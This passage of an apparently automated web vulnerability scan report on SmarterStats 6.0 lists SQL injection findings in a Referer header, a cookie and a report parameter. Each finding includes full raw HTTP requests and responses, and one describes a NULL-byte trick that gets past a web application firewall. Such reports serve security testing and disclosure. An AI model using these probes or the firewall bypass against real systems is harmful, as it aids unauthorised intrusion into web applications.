       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'AddSite2%27%27' was not found in service SiteAdmin.
</span>


</body>
</html>

2.21. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:21 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5501

1|#||4|3862|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Login Failed</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="1" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="weirdo" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" checked="checked" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
   <option selected="selected" value="">Use Browser Language</option>
   <option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               
           |0|hiddenField|__LASTFOCUS||0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||688|hiddenField|__VIEWSTATE|/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlBQxMb2dpbiBGYWlsZWQeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHQFLjxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5Mb2dpbiBGYWlsZWQ8L2Rpdj5kAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFZGh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPURBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPUxvZ2luQWRtaW5kZAIHDw8WAh4ISW1hZ2VVcmwFBi9zLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRZjdGwwMCRNUEgkY2hrQXV0b0xvZ2luBRdjdGwwMCRCUEgkYnRuRW50ZXJDbGljazeRhfTBWk1Gcf21tGgBcTcXgxWJvMSUysCEEwhh8iI2|0|asyncPostBackControlIDs|||0|postBackControlIDs|||20|updatePanelIDs||tctl00$UpdatePanel1,|0|childUpdatePanelIDs|||19|panelsToRefreshIDs||ctl00$UpdatePanel1,|2|asyncPostBackTimeout||90|10|formAction||login.aspx|33|pageTitle||SmarterStats Login - SmarterStats|251|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\t\t\t\t\t$(document).ready(function() {\r\n\t\t\t\t\t\t\t$(\u0027select\u0027).each(function() {\r\n\t\t\t\t\t\t\t\tif ($(this).width() \u003e 180) $(this).width(180);\r\n\t\t\t\t\t\t\t});\r\n\t\t\t\t\t\t}); ","type":"text/javascript"}|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|19|focus||ctl00_MPH_txtSiteId|

Request 2

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:21 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Set-Cookie: loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 40
Connection: Close

1|#||4|15|pageRedirect||%2fdefault.aspx|

2.22. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}%00'

Response 1 (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:22:12 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 6129



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Error" dir="ltr">
<form name="aspnetForm" method="post" action="frmError.aspx?aspxerrorpath=%2fdefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAUSJiN4MkY7ZGVmYXVsdC5hc3B4ZGQCBw8PFgIfAwXRATxwPlRoZSBwYWdlIG9yIHJlc291cmNlIHRoYXQgeW91IGFyZSBhY2Nlc3NpbmcgaXMgdW5hdmFpbGFibGUgb3IgYW4gZXJyb3IgaGFzIG9jY3VycmVkLjwvcD4NCg0KPHA+VGhpcyBlcnJvciBvY2N1cnJlZCBhdCAxMC8xMS8yMDEwIDg6MjI6MTIgUE0gYW5kIGhhcyBiZWVuIGxvZ2dlZC4gUGxlYXNlIGNvbnRhY3QgeW91ciBzeXN0ZW0gYWRtaW5pc3RyYXRvci48L3A+ZGRkB5djj46db2q7LuJFIDXrhDiyvZgtsD/WuKDWWDSXzKE=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;default.aspx</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/11/2010 8:22:12 PM and has been logged. Please contact your system administrator.</p></span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='1' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

</form>
</body>
</html>

Request 2

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}%00''

Response 2

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:22:12 GMT
X-AspNet-Version: 4.0.30319
Location: /default.aspx
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:22:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/default.aspx">here</a>.</h2>
</body></html>

2.23. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [ReportType parameter]  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The ReportType parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReportType parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard'&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhoCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o%2BjgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwYFEzIwMTAtMTAtMDMtMDAtMDAtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8KaB8IBgBAyvij6OAHZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYE